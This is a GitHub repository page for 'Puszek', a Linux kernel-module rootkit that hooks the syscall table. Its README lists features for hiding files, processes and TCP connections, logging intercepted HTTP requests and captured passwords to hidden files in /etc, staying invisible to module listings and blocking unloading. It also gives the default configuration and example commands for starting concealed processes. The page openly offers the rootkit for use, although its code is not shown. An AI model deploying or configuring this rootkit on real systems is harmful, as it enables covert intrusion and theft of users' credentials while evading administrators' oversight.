Skip to content

Eterna1/puszek-rootkit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 

Repository files navigation

Puszek

Yet another LKM rootkit for Linux. It hooks syscall table.

Features:

  1. Hide files that ends on configured suffix (FILE_SUFFIX - ".rootkit" by default).
  2. Hide processes that cmdline contains defined text (COMMAND_CONTAINS - ".//./" by default).

Examples:

.//./malicious_process
wget https://old-releases.ubuntu.com/releases/zesty/ubuntu-17.04-desktop-amd64.iso .//./
  1. Intercept HTTP requests.
    All intercepted GET and POST HTTP requests are logged to /etc/http_requests[FILE_SUFFIX].
    When password is found in HTTP request it's additionally logged to /etc/passwords[FILE_SUFFIX].
  2. Rootkit module is invisible in lsmod output, file /proc/modules, and directory /sys/module/.
  3. It isn't possible to unload rootkit by rmmod command (if option UNABLE_TO_UNLOAD is set).
  4. Netstat and similar tools won't see TCP connections of hidden processes.

Configuration:

The configuration is placed at the beginning of file rootkit.c.
Below is a default configuration:

//beginning of the rootkit's configuration
#define FILE_SUFFIX ".rootkit"    	//hiding files with names ending on defined suffix
#define COMMAND_CONTAINS ".//./"    //hiding processes which cmdline contains defined text
#define ROOTKIT_NAME "rootkit"    	//you need to type here name of this module to make this module hidden
#define SYSCALL_MODIFY_METHOD PAGE_RW   //method of making syscall table writeable, CR0 or PAGE_RW
#define UNABLE_TO_UNLOAD 0
#define DEBUG 0                     //this is for me :)
//end of configuration

Tested on:

Linux x 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux

Releases

No releases published

Packages

No packages published